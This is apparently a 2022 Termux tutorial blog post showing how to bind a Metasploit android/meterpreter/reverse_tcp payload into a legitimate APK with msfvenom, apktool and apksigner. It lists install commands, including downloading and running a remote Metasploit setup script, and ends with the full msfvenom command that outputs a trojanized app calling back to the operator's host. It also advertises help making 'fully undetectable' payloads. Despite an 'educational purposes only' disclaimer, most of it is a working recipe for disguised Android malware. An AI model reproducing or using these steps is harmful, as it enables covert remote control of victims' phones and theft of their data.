How to bind apk payload in termux with Msfvenom | Termux tutorial

March 14, 2022
pkg update;pkg upgrade
termux-setup-storage
pkg install openjdk-17
pkg install apktool
pkg install apksigner
To bind APK payload in Termux with Msfvenom you require the Metasploit and some prerequisite/dependencies we are going to discuss in this blog.

Hello and welcome back to EFX Tv Uk2blogger. I know our viewers are always ready to learn ethical hacking, tips and tricks. We love to teach Linux things for educational purposes only. In this blog, we are going to learn the best way to Bind a legit android application in Termux with Msfvenom in another way we will learn how to bind APK payload in termux with Msfvenom

How to bind apk payload in termux with Msfvenom | Termux tutorial

I know that you are amazed like I were before creating this blog. How is it be possible? msfvenom requires apktool and Java 8 plus root access to bind the applications perfectly. Binding applications were not possible in an older version of the Termux application. I'll request you to update the termux to learn how to bind APK payload in termux with Msfvenom.

Before we start the binding process this is to inform you we have a telegram group where we use to practice Live by sharing the screen with all the members. If you want to join us please Join and enjoy the Live Ethical Hacking Demonstration in your own language English and Hindi.

How to bind apk payload in termux with Msfvenom?
The top 15 applications are used to Bind apk payload in Desktop-based OS are listed below. If you are Linux script lovers, must read them. All the desktop apk binder has their own requirements but termux has an easier way to install them. In this blog, our main focus will be on how to bind apk payload in termux with Msfvenom.


Requirements to Embed a Metasploit Payload in an Original apk are listed below

1 Updated Termux with Termux ApI
The updated termux tool will provide you easy access to all the latest repositories and dependencies to bind apk payload in termux with Msfvenom.
2 Metasploit-framework in temrux
To install Metasploit-framework in termux you need to follow the commands written below (source on Github):
$ pkg update; pkg upgrade
$ pkg install wget curl
$ cd $HOME;wget https://raw.githubusercontent.com/efxtv/Metasploit-in-termux/main/metasploit-6-termux.sh -q;bash metasploit-6-termux.sh 
$ rm -rf /data/data/com.termux/files/usr/bin/msfvenom
$ cd;cd metasploit-framework;ln -s $HOME/metasploit-framework/msfvenom /data/data/com.termux/files/usr/bin/
3 Default Updated termux repositories
We require updated repositories in termux to locate the several binaries present in the form of executable.
$ pkg update;pkg upgrade
4 Storage permissions in termux
Storage permission in temrux is required so that we could save the application directly in our sdcard (means phone memory). To verify run the command ls /sdcard it will show you the list of files present in your phone memory. If it failed to show the list of files in temrux please check the detailed article here.
$ termux-setup-storage
5 Openjdk-17 in termux
OpenJDK helps in decompiling the Java files in readable form and is one of the most required components to bind apk payload in termux with Msfvenom.
$ pkg install openjdk-17
6 APKtool in termux
Apktool in termux uses JAVA to decompile, edit and recompile the apk smali files and components to create the final application.
$ pkg install apktool
7 Apksigner in termux
Apksigner in termux will be used the post to APKtool. It provides a valid signature to the built android apk application so that we can use the application without any error.
$ pkg install apksigner
Final Step to bind apk
The final step to How to bind apk payload in termux with Msfvenom We are going to use Msfvenonm to bind payload in termux. If you want to check all the payload lists visit here
  • -x app.apk oreginal apk

  • android/meterpreter/ reverse_tcp type of payload

  • LHOST Wifi users 192.198**, mobile data users use Ngrok

  • LPORT system port or VPN port. Visit here for more...

  • -o /sdcard/out.apk create the output application in phone memory root directory

  • $ msfvenom -x app.apk -p android/meterpreter/reverse_tcp lhost=192.168.1.1 lport=5555 -o /sdcard/out.apk 
    
    How to bind apk payload in termux with Msfvenom | Termux tutorial

    I hope this would be a helpful tutorial for you and working too. If you want to Learn How to Create a Fully Undetectable payload in termux must check our telegram group and ask for the details. We will be glad to help you out.

    Uk2blogger